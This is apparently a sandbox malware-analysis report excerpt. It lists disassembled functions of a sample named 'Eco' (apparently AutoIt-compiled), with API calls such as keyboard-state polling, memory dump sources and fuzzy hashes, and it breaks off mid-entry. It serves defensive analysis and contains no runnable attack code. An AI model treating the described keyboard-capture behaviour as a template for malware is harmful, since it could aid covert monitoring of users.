                          • CoInitialize.OLE32(00000000), ref: 0057DA9A
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057DB2D
                          • SHGetDesktopFolder.SHELL32(?), ref: 0057DB41
                          • CoCreateInstance.OLE32(005A3D4C,00000000,00000001,005C9BEC,?), ref: 0057DB8D
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057DBFC
                          • CoTaskMemFree.OLE32(?,?), ref: 0057DC54
                          • _memset.LIBCMT ref: 0057DC91
                          • SHBrowseForFolderW.SHELL32(?), ref: 0057DCCD
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057DCF0
                          • CoTaskMemFree.OLE32(00000000), ref: 0057DCF7
                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057DD2E
                          • CoUninitialize.OLE32(00000001,00000000), ref: 0057DD30
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                          • String ID:
                          • API String ID: 1246142700-0
                          • Opcode ID: e4387ade3d24e3611e2ff8defef70fd7621685cef59c74faa20fda8a6486caf6
                          • Instruction ID: 01c58b29a1029084884940b34f21cf69a019dfc401f142b9c9b35a2fbdc09009
                          • Opcode Fuzzy Hash: e4387ade3d24e3611e2ff8defef70fd7621685cef59c74faa20fda8a6486caf6
                          • Instruction Fuzzy Hash: 9BB1F775A00119AFDB04DFA4D888DAEBBB9FF89304F148459F909EB261DB30ED45DB60
                          Function 00570687 Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00570702
                          • SetKeyboardState.USER32(?), ref: 0057076D
                          • GetAsyncKeyState.USER32(000000A0), ref: 0057078D
                          • GetKeyState.USER32(000000A0), ref: 005707A4
                          • GetAsyncKeyState.USER32(000000A1), ref: 005707D3
                          • GetKeyState.USER32(000000A1), ref: 005707E4
                          • GetAsyncKeyState.USER32(00000011), ref: 00570810
                          • GetKeyState.USER32(00000011), ref: 0057081E
                          • GetAsyncKeyState.USER32(00000012), ref: 00570847
                          • GetKeyState.USER32(00000012), ref: 00570855
                          • GetAsyncKeyState.USER32(0000005B), ref: 0057087E
                          • GetKeyState.USER32(0000005B), ref: 0057088C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 897310d6e289d5f931d372bae1cee6221900d69a914e5e491d84c4fae12a55dc
                          • Instruction ID: 7a60f1f3a10f024977f1ee65bd8436164bae23497c67a3cf4b9105e2f724b143
                          • Opcode Fuzzy Hash: 897310d6e289d5f931d372bae1cee6221900d69a914e5e491d84c4fae12a55dc
                          • Instruction Fuzzy Hash: 2B514A3090478969FB34E7B0A4147ABBFF4AF01340F08D59E89CA571C3DA54AA4CDBA2
                          Function 0056CBE3 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 0056CBFF
                          • GetWindowRect.USER32(00000000,?), ref: 0056CC11
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056CC6F
                          • GetDlgItem.USER32(?,00000002), ref: 0056CC7A
                          • GetWindowRect.USER32(00000000,?), ref: 0056CC8C
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056CCE0
                          • GetDlgItem.USER32(?,000003E9), ref: 0056CCEE
                          • GetWindowRect.USER32(00000000,?), ref: 0056CCFF
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056CD42
                          • GetDlgItem.USER32(?,000003EA), ref: 0056CD50
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056CD6D
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0056CD7A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 1ba773dcd6708a1c16e66c784142f151346fc035f40f0f136f9804bf5b945dd6
                          • Instruction ID: 799531d2e4db66ca5388a8c9c90fa3d4f686a7a842fff5b778938fd953321100
                          • Opcode Fuzzy Hash: 1ba773dcd6708a1c16e66c784142f151346fc035f40f0f136f9804bf5b945dd6
                          • Instruction Fuzzy Hash: FD511E71B10205AFDB18CFA9DD89AAEBFB6FB99310F148129F616D72D0D770AD048B50
                          Function 00512581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          • GetSysColor.USER32(0000000F), ref: 005125AF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: aee5a2be455555f4faefbedc89bb2783453aeeeedbcdc6793ca1da41bc291521
                          • Instruction ID: b5af61873400091fa0b32085d1df9d782826df51b56ca8773ab5073c1e63b7f1
                          • Opcode Fuzzy Hash: aee5a2be455555f4faefbedc89bb2783453aeeeedbcdc6793ca1da41bc291521
                          • Instruction Fuzzy Hash: AB41DF30101140AFEB205F28DC88BF93F66FB5A335F194265FD658A1E2DB308C92EB21
                          Function 005229BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00530AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00522A3E,?,00008000), ref: 00530AD2
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00522C2C
                            • Part of subcall function 00523EBE: _wcscpy.LIBCMT ref: 00523EF6
                            • Part of subcall function 0053379F: _iswctype.LIBCMT ref: 005337A7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                          • API String ID: 537147316-3738523708
                          • Opcode ID: 359bbdcc508ea75eec5aef9a56a18f2f907aaf9e061a9f3046cebc0b7d76ec9e
                          • Instruction ID: fcbcf567b05bf917f192b5e5e40730c04c4c215aac81323f81d57b1281958c46
                          • Opcode Fuzzy Hash: 359bbdcc508ea75eec5aef9a56a18f2f907aaf9e061a9f3046cebc0b7d76ec9e
                          • Instruction Fuzzy Hash: 52027D71508352AFC724EF24D855AAFBFE5BFD6314F00492EF485932A1DB309A49CB42
                          Function 0059C3AF Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                            • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                            • Part of subcall function 00512714: ScreenToClient.USER32(005D67B0,?), ref: 00512744
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0059C417
                          • ImageList_EndDrag.COMCTL32 ref: 0059C41D
                          • ReleaseCapture.USER32 ref: 0059C423
                          • SetWindowTextW.USER32(?,00000000), ref: 0059C4CD
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0059C4E0
                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0059C5C2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr]$pr]
                          • API String ID: 1924731296-454660812
                          • Opcode ID: ed540159ded792fcc6b51b04bee8bb1d8f77da5517aae58f6cee5aa38af89428
                          • Instruction ID: 59a39d29d2bb284ad6302f41188b2f9b03b5621548d49155d556199c588b9e29
                          • Opcode Fuzzy Hash: ed540159ded792fcc6b51b04bee8bb1d8f77da5517aae58f6cee5aa38af89428
                          • Instruction Fuzzy Hash: 59518770204305AFDB10EF24C85AFAA7FE0FB99310F00491AF595872E1CB70A949EB52
                          Function 00514D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __i64tow__itow__swprintf
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 421087845-2263619337
                          • Opcode ID: f2df4df083ee1420014d14a2877d22b2f1cd31bed91b70073c31460c74d159eb
                          • Instruction ID: 89258002095ae12c824277a149117f33c94076f09ccc09ebc72a3cc32a59a822
                          • Opcode Fuzzy Hash: f2df4df083ee1420014d14a2877d22b2f1cd31bed91b70073c31460c74d159eb
                          • Instruction Fuzzy Hash: 3741E27150420AAEEF24DF74E846EBA7FF8FF85304F20486EE549D7291EA319941CB61
                          Function 0059753F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00597557
                          • CreateMenu.USER32 ref: 00597572
                          • SetMenu.USER32(?,00000000), ref: 00597581
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059760E
                          • IsMenu.USER32(?), ref: 00597624
                          • CreatePopupMenu.USER32 ref: 0059762E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059765B
                          • DrawMenuBar.USER32 ref: 00597663
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                          • String ID: 0$F
                          • API String ID: 176399719-3044882817
                          • Opcode ID: 5e1280845a39ada298eb947f2c56878fa8c53c375f97227d45197f45b75193dc
                          • Instruction ID: b2d7bf7aadddc29ebd70aa49dfe13f1a14527e8254e2e35ec7d22d97d8ef1eba
                          • Opcode Fuzzy Hash: 5e1280845a39ada298eb947f2c56878fa8c53c375f97227d45197f45b75193dc
                          • Instruction Fuzzy Hash: A2416878A11209EFDF20DF68D884AAA7BF5FF5E340F14006AE945973A0D770A914DF90
                          Function 005978A8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0059794B
                          • CreateCompatibleDC.GDI32(00000000), ref: 00597952
                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597965
                          • SelectObject.GDI32(00000000,00000000), ref: 0059796D
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00597978
                          • DeleteDC.GDI32(00000000), ref: 00597981
                          • GetWindowLongW.USER32(?,000000EC), ref: 0059798B
                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0059799F
                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005979AB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                          • String ID: static
                          • API String ID: 2559357485-2160076837
                          • Opcode ID: 3860c0dae97e3b491e9572b5a083fcbe5b501840d7a10e1b3beec525b4282459
                          • Instruction ID: 4ba7b752e63f427e694745f47b91f596c71f01427aa04f52f399dc63de9ac094
                          • Opcode Fuzzy Hash: 3860c0dae97e3b491e9572b5a083fcbe5b501840d7a10e1b3beec525b4282459
                          • Instruction Fuzzy Hash: BB317832124219ABEF119F64DC09FEB3F69FF5E364F100216FA55A60E0C7319825EBA4
                          Function 00536F60 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00536F9B
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • __gmtime64_s.LIBCMT ref: 00537034
                          • __gmtime64_s.LIBCMT ref: 0053706A
                          • __gmtime64_s.LIBCMT ref: 00537087
                          • __allrem.LIBCMT ref: 005370DD
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005370F9
                          • __allrem.LIBCMT ref: 00537110
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0053712E
                          • __allrem.LIBCMT ref: 00537145
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537163
                          • __invoke_watson.LIBCMT ref: 005371D4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                          • Instruction ID: 463a5fab80120cb36fa04d118fb1d61cf0ec90f7e246a053146768bbf510e170
                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                          • Instruction Fuzzy Hash: 2071E6B2E0071BBBD7249E79CC46BAABBA8BF55724F148239F514D7281E770D9408BD0
                          Function 00572B3A Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00572B55
                          • GetMenuItemInfoW.USER32(005D6890,000000FF,00000000,00000030), ref: 00572BB6
                          • SetMenuItemInfoW.USER32(005D6890,00000004,00000000,00000030), ref: 00572BEC
                          • Sleep.KERNEL32(000001F4), ref: 00572BFE
                          • GetMenuItemCount.USER32(?), ref: 00572C42
                          • GetMenuItemID.USER32(?,00000000), ref: 00572C5E
                          • GetMenuItemID.USER32(?,-00000001), ref: 00572C88
                          • GetMenuItemID.USER32(?,?), ref: 00572CCD
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572D13
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572D27
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572D48
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 8064e074d8e75301d2019d31ab0f90ee86154c2dc2b150daaf6e9d9cca35f9e3
                          • Instruction ID: 047c286df55f6f5678ba3cff9adc36f7a5359586fd0ff75f93aa83f59915f332
                          • Opcode Fuzzy Hash: 8064e074d8e75301d2019d31ab0f90ee86154c2dc2b150daaf6e9d9cca35f9e3
                          • Instruction Fuzzy Hash: AC61AFB0900249AFDF21CF64EC889BE7FB8FB55304F148459E809A7291D731AD06FB21
                          Function 00597310 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00597392
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00597395
                          • GetWindowLongW.USER32(?,000000F0), ref: 005973B9
                          • _memset.LIBCMT ref: 005973CA
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005973DC
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00597454
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 77600e12936564fb3c724cc3371444e9a92cfc6c1b0201460d9b0a9e45dc94be
                          • Instruction ID: 2f84b2aa19a2adeca4f1c3fae105931dce73caba764b1ba7b5ee47e08715ce97
                          • Opcode Fuzzy Hash: 77600e12936564fb3c724cc3371444e9a92cfc6c1b0201460d9b0a9e45dc94be
                          • Instruction Fuzzy Hash: 66615B75900208AFDF20DF98CC85EEE7BF8FB49714F10055AFA14A72A1C770A946DB90
                          Function 00567599 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005675C0
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00567619
                          • VariantInit.OLEAUT32(?), ref: 0056762B
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0056764B
                          • VariantCopy.OLEAUT32(?,?), ref: 0056769E
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 005676B2
                          • VariantClear.OLEAUT32(?), ref: 005676C7
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 005676D4
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005676DD
                          • VariantClear.OLEAUT32(?), ref: 005676EF
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005676FA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 12989be504198208603404533a69048f1895dc48696e28dd4b19dc4b08628c16
                          • Instruction ID: f1d4b39fadb86ff22564e9932e0ecf5b75ce7f56209a8c96de418db22f9cf7d2
                          • Opcode Fuzzy Hash: 12989be504198208603404533a69048f1895dc48696e28dd4b19dc4b08628c16
                          • Instruction Fuzzy Hash: 05416B75A1421DAFCF00DFA8D8489ADBFB9FF5C354F008069E915A7261CB30A949DFA0
                          Function 00570374 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 0057039C
                          • GetAsyncKeyState.USER32(000000A0), ref: 0057041D
                          • GetKeyState.USER32(000000A0), ref: 00570438
                          • GetAsyncKeyState.USER32(000000A1), ref: 00570452
                          • GetKeyState.USER32(000000A1), ref: 00570467
                          • GetAsyncKeyState.USER32(00000011), ref: 0057047F
                          • GetKeyState.USER32(00000011), ref: 00570491
                          • GetAsyncKeyState.USER32(00000012), ref: 005704A9
                          • GetKeyState.USER32(00000012), ref: 005704BB
                          • GetAsyncKeyState.USER32(0000005B), ref: 005704D3
                          • GetKeyState.USER32(0000005B), ref: 005704E5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                          • Instruction ID: c59fd93413e0996ca141de5c5ac26f9ebd5bea2cfc220c17857b3f1a346d06cf
